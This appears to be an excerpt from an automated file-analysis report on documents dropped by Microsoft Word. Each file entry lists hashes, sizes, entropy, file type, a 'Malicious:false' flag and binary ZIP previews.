                            SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                            Malicious:false
                            Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1204049
                            Entropy (8bit):7.92476783994848
                            Encrypted:false
                            SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                            MD5:FD5BBC58056522847B3B75750603DF0C
                            SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                            SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                            SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                            Malicious:false
                            Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):486596
                            Entropy (8bit):7.668294441507828
                            Encrypted:false
                            SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                            MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                            SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                            SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                            SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                            Malicious:false
                            Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):976001
                            Entropy (8bit):7.791956689344336
                            Encrypted:false
                            SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                            MD5:9E563D44C28B9632A7CF4BD046161994
                            SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                            SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                            SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):1463634
                            Entropy (8bit):7.898382456989258
                            Encrypted:false
                            SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                            MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                            SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                            SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                            SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):2218943
                            Entropy (8bit):7.942378408801199
                            Encrypted:false
                            SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                            MD5:EE33FDA08FBF10EF6450B875717F8887
                            SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                            SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                            SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                            Malicious:false
                            Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1750795
                            Entropy (8bit):7.892395931401988
                            Encrypted:false
                            SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                            MD5:529795E0B55926752462CBF32C14E738
                            SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                            SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                            SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):2924237
                            Entropy (8bit):7.970803022812704
                            Encrypted:false
                            SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                            MD5:5AF1581E9E055B6E323129E4B07B1A45
                            SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                            SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                            SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                            Malicious:false
                            Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):2357051
                            Entropy (8bit):7.929430745829162
                            Encrypted:false
                            SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                            MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                            SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                            SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                            SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):3611324
                            Entropy (8bit):7.965784120725206
                            Encrypted:false
                            SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                            MD5:FB88BFB743EEA98506536FC44B053BD0
                            SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                            SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                            SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1091485
                            Entropy (8bit):7.906659368807194
                            Encrypted:false
                            SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                            MD5:2192871A20313BEC581B277E405C6322
                            SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                            SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                            SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                            Malicious:false
                            Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):608122
                            Entropy (8bit):7.729143855239127
                            Encrypted:false
                            SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                            MD5:8BA551EEC497947FC39D1D48EC868B54
                            SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                            SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                            SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                            Malicious:false
                            Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):5783
                            Entropy (8bit):7.88616857639663
                            Encrypted:false
                            SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                            MD5:8109B3C170E6C2C114164B8947F88AA1
                            SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                            SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                            SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                            Malicious:false
                            Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):4026
                            Entropy (8bit):7.809492693601857
                            Encrypted:false
                            SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                            MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                            SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                            SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                            SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                            Malicious:false
                            Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):4243
                            Entropy (8bit):7.824383764848892
                            Encrypted:false
                            SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                            MD5:7BC0A35807CD69C37A949BBD51880FF5
                            SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                            SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                            SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                            Malicious:false
                            Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):16806
                            Entropy (8bit):7.9519793977093505
                            Encrypted:false
                            SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                            MD5:950F3AB11CB67CC651082FEBE523AF63
                            SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                            SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                            SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                            Malicious:false
